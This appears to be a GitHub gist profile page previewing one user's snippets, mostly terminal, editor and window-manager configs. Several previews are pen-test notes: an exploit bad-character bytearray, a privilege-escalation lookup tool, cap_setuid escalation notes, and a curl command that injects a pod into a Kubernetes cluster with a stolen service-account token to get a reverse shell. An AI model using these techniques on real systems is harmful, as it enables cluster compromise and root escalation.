Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
collecting dust;

dualfade

💭
collecting dust;
View GitHub Profile
View Bad Char Array --
bc = bytearray (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d"
b"\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a"
b"\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27"
b"\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34"
b"\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41"
b"\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e"
b"\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b"
b"\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
b"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75"
View gist:f55ff9ac0aa4adfc31c24f952e8b4e42
[2] % gtfo -b tar
_ _ _ __
_| || |_ | | / _|
|_ __ _| __ _| |_| |_ ___
_| || |_ / _` | __| _/ _ \
|_ __ _| | (_| | |_| || (_) |
|_||_| \__, |\__|_| \___/
__/ |
|___/
View docker ufw --
BlackArch / ArchLinux Latest --
Docker UFW issues --
docker.json update --
% cat /etc/docker/daemon.json
{
"iptables": false
}
ufw default fwd policy update --
View neovim-init.vim blackarch --
# spacevim pissing me off --
# moving to neovim-init / blackarch --
# orig --
# https://github.com/Optixal/neovim-init.vim
# refs --
# https://github.com/neoclide/coc.nvim
# https://github.com/VundleVim/Vundle.vim
Note:
View kubernetes pod injection --
Post request to cluster --
Most articles talked about using "default" as the namespace;
this target needed a very specific namespace to be used because of the token and privileges.
% curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json
yaml pod template --
Convert to json for proper injection --
Obviously you have to have enough privileges to use hostPath --
This particular pen-test aws was breached compromising the kube-system jwt and then the json reverse shell was
View dot screenrc
# GNU Screen - main configuration file
# Allow bold colors - necessary for some reason
attrcolor b ".I"
# Tell screen how to set colors. AB = background, AF=foreground
termcapinfo xterm 'Co#256:AB=\E[48;5;%dm:AF=\E[38;5;%dm'
# Enables use of shift-PgUp and shift-PgDn
termcapinfo xterm|xterms|xs|rxvt ti@:te@
View termite config --
# ~/.config/termite/config
[options]
allow_bold = true
font = Hack Nerd Font 8
icon_name = termite
scrollback_lines = 10000
[colors]
foreground = #c0c5ce
View Caps --
file with cap_setuid+ep ??
user with perms to make it so == root
Just some notes --
[user@lemur tmp]$ hostname ; id
lemur
uid=1001(user) gid=1001(user) groups=1001(user)
[user@lemur tmp]$ sudo -l
Matching Defaults entries for user on this host:
View blackarch awesome rofi
Disable std modkey r --
enable rofi --
-- Prompt
-- awful.key({ modkey }, "r", function () mypromptbox[mouse.screen.index]:run() end),
-- Run program (d for dmenu ;)
awful.key({ modkey }, "d",
function()
awful.spawn.with_shell("rofi -matching fuzzy -show combi")
View gist:f7f7e9ed7389ae2e9152042fb73c63c1
# ~/.config/termite/config
[options]
allow_bold = true
clickable_url = true
font = Hack Nerd Font 8
geometry = 700x520
icon_name = terminal
scrollback_lines = 10000
browser = lynx